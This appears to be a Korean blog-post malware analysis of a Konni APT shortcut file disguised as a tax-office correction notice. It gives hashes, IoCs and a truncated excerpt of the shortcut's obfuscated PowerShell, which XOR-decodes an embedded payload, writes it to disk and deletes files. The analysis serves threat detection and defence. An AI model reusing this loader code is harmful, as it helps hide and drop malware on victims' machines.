lazarusholic

Everyday is lazarus.dayβ

북한 해킹 단체 Konni APT(Advanced Persistant Threat) 만든 악성코드-오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp.lnk(2025.1.7)

2025-01-24, Sakai
https://wezard4u.tistory.com/429389
#Konni #LNK

Contents

오늘은 북한 해킹 단체 Konni APT(Advanced Persistant Threat) 에서 만든 악성코드인 오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp.lnk(2025.1.7)에 대해 글을 적어 보겠습니다. 북한 정찰총국 산하의 해킹 단체이며 한국과 미국 정부 기관 및 조직을 타겟으로 하고 있습니다.
외교 및 군사 기관도 대상으로 하고 있으며 아마도 국세징수법 시행 규칙 양식을 사용하는 것 보니까? 한국 국민을 대상으로 하지 않았을까 조심스럽게 생각을 합니다.
해쉬
파일명: 오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp.lnk
사이즈:372,872,757 Bytes
MD5:c8556d5dd6383b600a459a531beb05ff
SHA-1:3024b5438f5d63cdedb1c473cba07b1825b60a1f
SHA-256:4cd7e92ac6a3d068683d41beabd82d82267d97aa89603c708c0dd4af637d6d67
악성코드 포함된 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.e)xe ^
| findstr /i rshell.exe') do (if exist "%f" (%f "function predicate{param($beggar); <#
boiled narrowly#>$appetite = $beggar.substring(0,$be(g)gar.length-4) + ''; <#winter fa
iling#>return $appetite;};function perplexity{param($surprise);<(#)sonorous aggregate
#> remove-item <#intermediate dilute#> -path $surprise <#axis brain#> -force;};function
master{param($containing,$self,$eth(e)real,$bosom,$dependence);<#narrative collective#
> $shuffle=New-Object System.IO(.)FileStream(<#bruise chapel#>$containing,<#shoal ejec
t#>[System.IO.FileMode]::Open,<#vein vocation#>[S(y)stem.IO.FileAccess]::Read);<#rehea
rse rail#> $shuffle.Seek(<#damp density#>$self,[System.IO.SeekOrigin]::Begin);<#silver
y pump#> $tumultuous=$et(h)ereal*0x01;<#brilliant bowl#> $press=New-Object byte[] <#ac
curacy offset#>$ethereal; <#geology scrape#> $block=New-Object byte[] <#parcel swift#>
$t(u)multuous; <#elaborate remembrance#>$(s)huffle.Read(<#contracted restless#>$block,
0,<#conformity flush#>$tumultuous); $shuffle.Close();$dif(f)erential=0;whil(e)($differ
ential -lt $(e)thereal){<#master foresight#>$press[$differential]=$block[$differential
*0x01] -bxor $bosom;$differential++;}<#heroic ant(e)lope#> set-content $depend(e)nce <
#pension cloak#> $p(r)ess -Encodi(n)g …

IoC

3024b5438f5d63cdedb1c473cba07b1825b60a1f
c8556d5dd6383b600a459a531beb05ff
4cd7e92ac6a3d068683d41beabd82d82267d97aa89603c708c0dd4af637d6d67